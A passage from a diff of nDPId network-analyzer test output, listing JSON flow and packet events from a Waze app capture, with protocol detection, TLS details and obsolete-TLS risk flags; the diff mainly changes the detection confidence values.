+00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871941,"flow_last_seen":1435587872341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587872341,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872476,"flow_last_seen":1435587872476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1435587872476,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872476,"pkt":"ABoRAAACABoRAAABCABFAAA8WSJAAEAGvP4KCAABNubjrLHwAFDxQTSmAAAAAKAC\/\/\/drgAAAgQFtAQCCAoACG2EAAAAAAEDAwg="} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1435587872477,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872477,"pkt":"ABoRAAACABoRAAABCABFAAAodLxAABAG0Xg25uOsCggAAQBQsfAOvstZ8UE0p1AS\/\/\/Y9QAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1435587872478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872478,"pkt":"ABoRAAACABoRAAABCABFAAAoWSNAAEAGvREKCAABNubjrLHwAFDxQTSnDr7LWlAQ\/\/\/Y9gAA"} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
-00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":175,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871935,"flow_last_seen":1435587872515,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} 
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871918,"flow_last_seen":1435587872568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871939,"flow_last_seen":1435587872569,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587872569,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":175,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871935,"flow_last_seen":1435587872515,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871918,"flow_last_seen":1435587872568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871939,"flow_last_seen":1435587872569,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587872569,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872702,"flow_last_seen":1435587872702,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872702,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1435587872702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872702,"pkt":"ABoRAAACABoRAAABCABFAAA8Y6lAAEAGsncKCAABNubjrLHyAFAC8Q4\/AAAAAKAC\/\/\/yUgAAAgQFtAQCCAoACG2WAAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1435587872704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872704,"pkt":"ABoRAAACABoRAAABCABFAAAodMpAABAG0Wo25uOsCggAAQBQsfL9DvHAAvEOQFAS\/\/\/Y8wAA"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1435587872705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872705,"pkt":"ABoRAAACABoRAAABCABFAAAoY6pAAEAGsooKCAABNubjrLHyAFAC8Q5A\/Q7xwVAQ\/\/\/Y9AAA"} 
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871929,"flow_last_seen":1435587873486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587873486,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01235{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":249,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871935,"flow_last_seen":1435587873688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873688,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} -01235{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871929,"flow_last_seen":1435587873741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873741,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} 
-01236{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587871918,"flow_last_seen":1435587874033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1435587874033,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871929,"flow_last_seen":1435587873486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587873486,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} 
+01235{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":249,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871935,"flow_last_seen":1435587873688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873688,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +01235{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871929,"flow_last_seen":1435587873741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873741,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +01236{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587871918,"flow_last_seen":1435587874033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1435587874033,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, 